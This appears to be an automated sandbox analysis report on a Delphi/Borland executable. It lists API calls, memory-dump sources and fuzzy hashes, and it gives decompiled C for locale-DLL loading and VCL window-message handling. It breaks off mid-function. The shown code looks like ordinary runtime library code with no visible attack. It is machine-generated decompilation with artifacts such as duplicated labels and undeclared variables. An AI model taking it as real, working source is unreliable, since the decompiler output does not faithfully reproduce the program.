                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0046B08C), ref: 00405CD0
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405CEE
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D37
                                                                                • RegQueryValueExA.ADVAPI32(?,00405EE4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405D7D,?,80000001), ref: 00405D55
                                                                                • RegCloseKey.ADVAPI32(?,00405D84,00000000,00000000,00000005,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D77
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1759228003-2375825460
                                                                                • Opcode ID: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
                                                                                • Instruction ID: 50d7fcff162f8a2787b95d462eaa17d1600671633a99a01d037d82dc5577e201
                                                                                • Opcode Fuzzy Hash: 3911d75fb344ff54600c729ed1e39e570585950d4f09cac6ef099054284f545c
                                                                                • Instruction Fuzzy Hash: 11514B71A4060C7AFB25D6A4CC46FEF76ACDB04744F4040B7BA44F65C1EA789A448FA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E004548A0(struct HWND__* __eax, void* __ecx, struct HWND__* __edx) {
                                                                                				struct HWND__* _v8;
                                                                                				struct HWND__* _v12;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t161;
                                                                                				struct HWND__* _t162;
                                                                                				struct HWND__* _t163;
                                                                                				void* _t166;
                                                                                				struct HWND__* _t176;
                                                                                				struct HWND__* _t185;
                                                                                				struct HWND__* _t188;
                                                                                				struct HWND__* _t189;
                                                                                				struct HWND__* _t191;
                                                                                				struct HWND__* _t197;
                                                                                				struct HWND__* _t199;
                                                                                				struct HWND__* _t202;
                                                                                				struct HWND__* _t205;
                                                                                				struct HWND__* _t206;
                                                                                				struct HWND__* _t216;
                                                                                				struct HWND__* _t217;
                                                                                				struct HWND__* _t222;
                                                                                				struct HWND__* _t224;
                                                                                				struct HWND__* _t227;
                                                                                				struct HWND__* _t231;
                                                                                				struct HWND__* _t245;
                                                                                				struct HWND__* _t249;
                                                                                				struct HWND__* _t251;
                                                                                				struct HWND__* _t252;
                                                                                				struct HWND__* _t264;
                                                                                				intOrPtr _t267;
                                                                                				struct HWND__* _t270;
                                                                                				intOrPtr* _t271;
                                                                                				struct HWND__* _t279;
                                                                                				struct HWND__* _t281;
                                                                                				struct HWND__* _t292;
                                                                                				void* _t301;
                                                                                				signed int _t303;
                                                                                				struct HWND__* _t309;
                                                                                				struct HWND__* _t310;
                                                                                				struct HWND__* _t311;
                                                                                				void* _t312;
                                                                                				intOrPtr _t335;
                                                                                				struct HWND__* _t339;
                                                                                				intOrPtr _t361;
                                                                                				void* _t365;
                                                                                				struct HWND__* _t370;
                                                                                				void* _t371;
                                                                                				void* _t372;
                                                                                				intOrPtr _t373;
                                                                                
                                                                                				_t312 = __ecx;
                                                                                				_push(_t365);
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_push(_t372);
                                                                                				_push(0x454f30);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t373;
                                                                                				 *(_v12 + 0xc) = 0;
                                                                                				_t301 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xa8)) + 8)) - 1;
                                                                                				if(_t301 < 0) {
                                                                                					L5:
                                                                                					E00454754(_v8, _t312, _v12);
                                                                                					_t303 =  *_v12;
                                                                                					_t161 = _t303;
                                                                                					__eflags = _t161 - 0x53;
                                                                                					if(__eflags > 0) {
                                                                                						__eflags = _t161 - 0xb017;
                                                                                						if(__eflags > 0) {
                                                                                							__eflags = _t161 - 0xb020;
                                                                                							if(__eflags > 0) {
                                                                                								_t162 = _t161 - 0xb031;
                                                                                								__eflags = _t162;
                                                                                								if(_t162 == 0) {
                                                                                									_t163 = _v12;
                                                                                									__eflags =  *((intOrPtr*)(_t163 + 4)) - 1;
                                                                                									if( *((intOrPtr*)(_t163 + 4)) != 1) {
                                                                                										 *(_v8 + 0xb0) =  *(_v12 + 8);
                                                                                									} else {
                                                                                										 *(_v12 + 0xc) =  *(_v8 + 0xb0);
                                                                                									}
                                                                                									L99:
                                                                                									_t166 = 0;
                                                                                									_pop(_t335);
                                                                                									 *[fs:eax] = _t335;
                                                                                									goto L100;
                                                                                								}
                                                                                								__eflags = _t162 + 0xfffffff2 - 2;
                                                                                								if(_t162 + 0xfffffff2 - 2 < 0) {
                                                                                									 *(_v12 + 0xc) = E004567F8(_v8,  *(_v12 + 8), _t303) & 0x0000007f;
                                                                                								} else {
                                                                                									L98:
                                                                                									E00454818(_t372); // executed
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							if(__eflags == 0) {
                                                                                								_t176 = _v12;
                                                                                								__eflags =  *(_t176 + 4);
                                                                                								if( *(_t176 + 4) != 0) {
                                                                                									E0045549C(_v8, _t312,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                                								} else {
                                                                                									E00455440(_v8,  *( *(_v12 + 8)),  *((intOrPtr*)( *(_v12 + 8) + 4)));
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							_t185 = _t161 - 0xb01a;
                                                                                							__eflags = _t185;
                                                                                							if(_t185 == 0) {
                                                                                								_t188 = IsIconic( *(_v8 + 0x30));
                                                                                								__eflags = _t188;
                                                                                								if(_t188 == 0) {
                                                                                									_t189 = GetFocus();
                                                                                									_t339 = _v8;
                                                                                									__eflags = _t189 -  *((intOrPtr*)(_t339 + 0x30));
                                                                                									if(_t189 ==  *((intOrPtr*)(_t339 + 0x30))) {
                                                                                										_t191 = E0044C7E0(0);
                                                                                										__eflags = _t191;
                                                                                										if(_t191 != 0) {
                                                                                											SetFocus(_t191);
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							__eflags = _t185 == 5;
                                                                                							if(_t185 == 5) {
                                                                                								L88:
                                                                                								E00455980(_v8,  *(_v12 + 8),  *(_v12 + 4));
                                                                                								goto L99;
                                                                                							} else {
                                                                                								goto L98;
                                                                                							}
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							_t197 =  *(_v8 + 0x44);
                                                                                							__eflags = _t197;
                                                                                							if(_t197 != 0) {
                                                                                								_t367 = _t197;
                                                                                								_t199 = E0043BD14(_t197);
                                                                                								__eflags = _t199;
                                                                                								if(_t199 != 0) {
                                                                                									_t202 = IsWindowEnabled(E0043BD14(_t367));
                                                                                									__eflags = _t202;
                                                                                									if(_t202 != 0) {
                                                                                										_t205 = IsWindowVisible(E0043BD14(_t367));
                                                                                										__eflags = _t205;
                                                                                										if(_t205 != 0) {
                                                                                											 *0x46bb18 = 0;
                                                                                											_t206 = GetFocus();
                                                                                											SetFocus(E0043BD14(_t367));
                                                                                											E00436848(_t367,  *(_v12 + 4), 0x112,  *(_v12 + 8));
                                                                                											SetFocus(_t206);
                                                                                											 *0x46bb18 = 1;
                                                                                											 *(_v12 + 0xc) = 1;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L99;
                                                                                						}
                                                                                						__eflags = _t161 - 0xb000;
                                                                                						if(__eflags > 0) {
                                                                                							_t216 = _t161 - 0xb001;
                                                                                							__eflags = _t216;
                                                                                							if(_t216 == 0) {
                                                                                								_t217 = _v8;
                                                                                								__eflags =  *((short*)(_t217 + 0xf2));
                                                                                								if( *((short*)(_t217 + 0xf2)) != 0) {
                                                                                									 *((intOrPtr*)(_v8 + 0xf0))();
                                                                                								}
                                                                                								goto L99;
                                                                                							}
                                                                                							__eflags = _t216 == 0x15;
                                                                                							if(_t216 == 0x15) {
                                                                                								_t222 = E00455318(_v8, _t312, _v12);
                                                                                								__eflags = _t222;
                                                                                								if(_t222 != 0) {
                                                                                									 *(_v12 + 0xc) = 1;
                                                                                								}
                                                                                								goto L99;
                                                                                							} else {
                                                                                								goto L98;
                                                                                							}
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							_t224 = _v8;
                                                                                							__eflags =  *((short*)(_t224 + 0xfa));
                                                                                							if( *((short*)(_t224 + 0xfa)) != 0) {
                                                                                								 *((intOrPtr*)(_v8 + 0xf8))();
                                                                                							}
                                                                                							goto L99;
                                                                                						}
                                                                                						_t227 = _t161 - 0x112;
                                                                                						__eflags = _t227;
                                                                                						if(_t227 == 0) {
                                                                                							_t231 = ( *(_v12 + 4) & 0x0000fff0) - 0xf020;
                                                                                							__eflags = _t231;
                                                                                							if(_t231 == 0) {
                                                                                								E00454F94(_v8);
                                                                                							} else {
                                                                                								__eflags = _t231 == 0x100;
                                                                                								if(_t231 == 0x100) {
                                                                                									E00455044(_v8);
                                                                                								} else {
                                                                                									E00454818(_t372);
                                                                                								}
                                                                                							}
                                                                                							goto L99;
                                                                                						}
                                                                                						__eflags = _t227 + 0xffffffe0 - 7;
                                                                                						if(_t227 + 0xffffffe0 - 7 < 0) {
                                                                                							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t303 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
                                                                                							goto L99;
                                                                                						} else {
                                                                                							goto L98;
                                                                                						}
                                                                                					}
                                                                                					if(__eflags == 0) {
                                                                                						goto L88;
                                                                                					}
                                                                                					__eflags = _t161 - 0x16;
                                                                                					if(__eflags > 0) {
                                                                                						__eflags = _t161 - 0x1d;
                                                                                						if(__eflags > 0) {
                                                                                							_t245 = _t161 - 0x37;
                                                                                							__eflags = _t245;
                                                                                							if(_t245 == 0) {
                                                                                								 *(_v12 + 0xc) = E00454F78(_v8);
                                                                                								goto L99;
                                                                                							}
                                                                                							__eflags = _t245 == 0x13;
                                                                                							if(_t245 == 0x13) {
                                                                                								_t249 = _v12;
                                                                                								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) - 0xde534454;
                                                                                								if( *((intOrPtr*)( *((intOrPtr*)(_t249 + 8)))) == 0xde534454) {
                                                                                									_t251 = _v8;
                                                                                									__eflags =  *((char*)(_t251 + 0x9e));
                                                                                									if( *((char*)(_t251 + 0x9e)) != 0) {
                                                                                										_t252 = _v8;
                                                                                										__eflags =  *(_t252 + 0xa0);
                                                                                										if( *(_t252 + 0xa0) != 0) {
                                                                                											 *(_v12 + 0xc) = 0;
                                                                                										} else {
                                                                                											_t309 = E0040BAFC("vcltest3.dll", _t303, 0x8000);
                                                                                											 *(_v8 + 0xa0) = _t309;
                                                                                											__eflags = _t309;
                                                                                											if(_t309 == 0) {
                                                                                												 *(_v12 + 0xc) = GetLastError();
                                                                                												 *(_v8 + 0xa0) = 0;
                                                                                											} else {
                                                                                												 *(_v12 + 0xc) = 0;
                                                                                												_t370 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
                                                                                												_t310 = _t370;
                                                                                												__eflags = _t370;
                                                                                												if(_t370 != 0) {
                                                                                													_t264 =  *(_v12 + 8);
                                                                                													_t310->i( *((intOrPtr*)(_t264 + 4)),  *((intOrPtr*)(_t264 + 8)));
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                								goto L99;
                                                                                							} else {
                                                                                								goto L98;
                                                                                							}
                                                                                						}
                                                                                						if(__eflags == 0) {
                                                                                							_t267 =  *0x487c00; // 0x2290f1c
                                                                                							E00453DBC(_t267);
                                                                                							E00454818(_t372);
                                                                                							goto L99;
                                                                                						}
                                                                                						_t270 = _t161 - 0x1a;
                                                                                						__eflags = _t270;
                                                                                						if(_t270 == 0) {
                                                                                							_t271 =  *0x486d80; // 0x487b64
                                                                                							E00440560( *_t271, _t312,  *(_v12 + 4));
                                                                                							E004547AC(_v8, _t303, _t312, _v12, _t365);
                                                                                							E00454818(_t372);
                                                                                							goto L99;
                                                                                						}
                                                                                						__eflags = _t270 == 2;
                                                                                						if(_t270 == 2) {
                                                                                							E00454818(_t372);
                                                                                							_t279 = _v12;
                                                                                							__eflags =  *((intOrPtr*)(_t279 + 4)) - 1;
                                                                                							asm("sbb eax, eax");
                                                                                							 *((char*)(_v8 + 0x9d)) = _t279 + 1;
                                                                                							_t281 = _v12;
                                                                                							__eflags =  *(_t281 + 4);
                                                                                							if( *(_t281 + 4) == 0) {
                                                                                								E004546A8();
                                                                                								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0);
                                                                                							} else {
                                                                                								E004546B8(_v8);
                                                                                								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0);
                                                                                							}
                                                                                							goto L99;
                                                                                						} else {
                                                                                							goto L98;
                                                                                						}
                                                                                					}
                                                                                					if(__eflags == 0) {
                                                                                						_t292 = _v12;
                                                                                						__eflags =  *(_t292 + 4);
                                                                                						if( *(_t292 + 4) != 0) {
                                                                                							 *((char*)(_v8 + 0x9c)) = 1;
                                                                                						}
                                                                                						goto L99;
                                                                                					}
                                                                                					__eflags = _t161 - 0x14;
                                                                                					if(_t161 > 0x14) {
                                                                                						goto L98;
                                                                                					}
                                                                                					switch( *((intOrPtr*)(_t161 * 4 +  &M00454944))) {
                                                                                						case 0:
                                                                                							__eax = E0041B790();
                                                                                							goto L99;
                                                                                						case 1:
                                                                                							goto L98;
                                                                                						case 2:
                                                                                							_push(0);
                                                                                							_push(0);
                                                                                							_push(0xb01a);
                                                                                							_v8 =  *(_v8 + 0x30);
                                                                                							_push( *(_v8 + 0x30));
                                                                                							L00407040();
                                                                                							__eax = E00454818(__ebp);
                                                                                							goto L99;
                                                                                						case 3:
                                                                                							__eax = _v12;
                                                                                							__eflags =  *(__eax + 4);
                                                                                							if( *(__eax + 4) == 0) {
                                                                                								__eax = E00454818(__ebp);
                                                                                								__eax = _v8;
                                                                                								__eflags =  *(__eax + 0xac);
                                                                                								if( *(__eax + 0xac) == 0) {
                                                                                									__eax = _v8;
                                                                                									__eax =  *(_v8 + 0x30);
                                                                                									__eax = E0044C690( *(_v8 + 0x30), __ebx, __edi, __esi);
                                                                                									__edx = _v8;
                                                                                									 *(_v8 + 0xac) = __eax;
                                                                                								}
                                                                                								_v8 = L004546B0();
                                                                                							} else {
                                                                                								_v8 = E004546B8(_v8);
                                                                                								__eax = _v8;
                                                                                								__eax =  *(_v8 + 0xac);
                                                                                								__eflags = __eax;
                                                                                								if(__eax != 0) {
                                                                                									__eax = _v8;
                                                                                									__edx = 0;
                                                                                									__eflags = 0;
                                                                                									 *(_v8 + 0xac) = 0;
                                                                                								}
                                                                                								__eax = E00454818(__ebp);
                                                                                							}
                                                                                							goto L99;
                                                                                						case 4:
                                                                                							__eax = _v8;
                                                                                							__eax =  *(_v8 + 0x30);
                                                                                							_push(__eax);
                                                                                							L00406FA0();
                                                                                							__eflags = __eax;
                                                                                							if(__eax == 0) {
                                                                                								__eax = E00454818(__ebp);
                                                                                							} else {
                                                                                								__eax = E00454854(__ebp);
                                                                                							}
                                                                                							goto L99;
                                                                                						case 5:
                                                                                							__eax = _v8;
                                                                                							__eax =  *(_v8 + 0x44);
                                                                                							__eflags = __eax;
                                                                                							if(__eax != 0) {
                                                                                								__eax = E00452024(__eax, __ecx);
                                                                                							}
                                                                                							goto L99;
                                                                                						case 6:
                                                                                							__eax = _v12;
                                                                                							 *_v12 = 0x27;
                                                                                							__eax = E00454818(__ebp);
                                                                                							goto L99;
                                                                                					}
                                                                                				} else {
                                                                                					_t311 = _t301 + 1;
                                                                                					_t371 = 0;
                                                                                					L2:
                                                                                					L2:
                                                                                					if( *((intOrPtr*)(E00413FA4( *((intOrPtr*)(_v8 + 0xa8)), _t371)))() == 0) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						_t166 = 0;
                                                                                						_pop(_t361);
                                                                                						 *[fs:eax] = _t361;
                                                                                					}
                                                                                					L100:
                                                                                					return _t166;
                                                                                					L4:
                                                                                					_t371 = _t371 + 1;
                                                                                					_t311 = _t311 - 1;
                                                                                					__eflags = _t311;
                                                                                					if(_t311 != 0) {
                                                                                						goto L2;
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                			}

                                                                                0x00454934
                                                                                0x00454937
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0045493d
                                                                                0x00000000
                                                                                0x00454f18
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b07
                                                                                0x00454b09
                                                                                0x00454b0b
                                                                                0x00454b13
                                                                                0x00454b16
                                                                                0x00454b17
                                                                                0x00454b1d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454b8f
                                                                                0x00454b92
                                                                                0x00454b96
                                                                                0x00454bca
                                                                                0x00454bd0
                                                                                0x00454bd3
                                                                                0x00454bda
                                                                                0x00454bdc
                                                                                0x00454bdf
                                                                                0x00454be2
                                                                                0x00454be7
                                                                                0x00454bea
                                                                                0x00454bea
                                                                                0x00454bf3
                                                                                0x00454b98
                                                                                0x00454b9b
                                                                                0x00454ba0
                                                                                0x00454ba3
                                                                                0x00454ba9
                                                                                0x00454bab
                                                                                0x00454bb2
                                                                                0x00454bb5
                                                                                0x00454bb5
                                                                                0x00454bb7
                                                                                0x00454bb7
                                                                                0x00454bbe
                                                                                0x00454bc3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454ab7
                                                                                0x00454aba
                                                                                0x00454abd
                                                                                0x00454abe
                                                                                0x00454ac3
                                                                                0x00454ac5
                                                                                0x00454ad4
                                                                                0x00454ac7
                                                                                0x00454ac8
                                                                                0x00454acd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454a9f
                                                                                0x00454aa2
                                                                                0x00454aa5
                                                                                0x00454aa7
                                                                                0x00454aad
                                                                                0x00454aad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454adf
                                                                                0x00454ae2
                                                                                0x00454ae9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004548d6
                                                                                0x004548d6
                                                                                0x004548d7
                                                                                0x00000000
                                                                                0x004548d9
                                                                                0x004548f5
                                                                                0x00000000
                                                                                0x004548f7
                                                                                0x004548f7
                                                                                0x004548f9
                                                                                0x004548fc
                                                                                0x004548fc
                                                                                0x00454f45
                                                                                0x00454f4b
                                                                                0x00454904
                                                                                0x00454904
                                                                                0x00454905
                                                                                0x00454905
                                                                                0x00454906
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00454906

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RegisterAutomation$d{H$vcltest3.dll
                                                                                • API String ID: 0-2387504366
                                                                                • Opcode ID: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction ID: 8ad9d7c783a2c6ce4ebe263d3ed71b4ee7457bda608aaccbfb27e864ecc426a2
                                                                                • Opcode Fuzzy Hash: e26ccd446a316f4fbb8a516c3d14ae18cd1f500151cd010e907ea5265a56c9f3
                                                                                • Instruction Fuzzy Hash: B5E18F35A04205EFD700DB5DC985A5EB7B0AB8831AF2580A6EC049F753D738EEC9DB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 61%
                                                                                			E00405D84() {
                                                                                				void* _t28;
                                                                                				void* _t30;
                                                                                				struct HINSTANCE__* _t36;
                                                                                				struct HINSTANCE__* _t42;
                                                                                				char* _t51;
                                                                                				void* _t52;
                                                                                				struct HINSTANCE__* _t59;
                                                                                				void* _t61;
                                                                                
                                                                                				_push(0x105);
                                                                                				_push( *((intOrPtr*)(_t61 - 4)));
                                                                                				_push(_t61 - 0x11d);
                                                                                				L00401310();
                                                                                				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                                                                                				_t59 = 0;
                                                                                				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                                                                                					L14:
                                                                                					return _t59;
                                                                                				} else {
                                                                                					_t28 = _t61 - 0x11d;
                                                                                					_push(_t28);
                                                                                					L00401318();
                                                                                					_t51 = _t28 + _t61 - 0x11d;
                                                                                					L5:
                                                                                					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                                                                                						_t51 = _t51 - 1;
                                                                                						goto L5;
                                                                                					}
                                                                                					_t30 = _t61 - 0x11d;
                                                                                					if(_t51 != _t30) {
                                                                                						_t52 = _t51 + 1;
                                                                                						if( *((char*)(_t61 - 0x12)) != 0) {
                                                                                							_push(0x105 - _t52 - _t30);
                                                                                							_push(_t61 - 0x12);
                                                                                							_push(_t52);
                                                                                							L00401310();
                                                                                							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                                                                                						}
                                                                                						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                                                                                							_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                							_push(_t61 - 0xd);
                                                                                							_push(_t52);
                                                                                							L00401310();
                                                                                							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                							_t59 = _t36;
                                                                                							if(_t59 == 0) {
                                                                                								 *((char*)(_t61 - 0xb)) = 0;
                                                                                								_push(0x105 - _t52 - _t61 - 0x11d);
                                                                                								_push(_t61 - 0xd);
                                                                                								_push(_t52);
                                                                                								L00401310();
                                                                                								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                                                                                								_t59 = _t42;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					goto L14;
                                                                                				}
                                                                                			}












                                                                                APIs
                                                                                • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405D94
                                                                                • GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405DA1
                                                                                • GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405DA7
                                                                                • lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405DD2
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E19
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E29
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405E51
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405E61
                                                                                • lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405E87
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405E97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                • API String ID: 1599918012-2375825460
                                                                                • Opcode ID: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
                                                                                • Instruction ID: 1996122f5b3b820df51850e3b8abf2c553d6293b2967b506f70bd3d03d36238e
                                                                                • Opcode Fuzzy Hash: cb28f160dafa1149e6bab2272285a120a5385a2738fad10cdcded8b14b4c15f3
                                                                                • Instruction Fuzzy Hash: 82315071E0061C2AFB25D6B8DC8ABEF66AC8B04384F4441F7B644F61C1DA789F848F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00440BF4(void* __ecx, void* __edi, void* __esi) {
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t8;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t12;
                                                                                				intOrPtr _t14;
                                                                                				void* _t16;
                                                                                				void* _t17;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
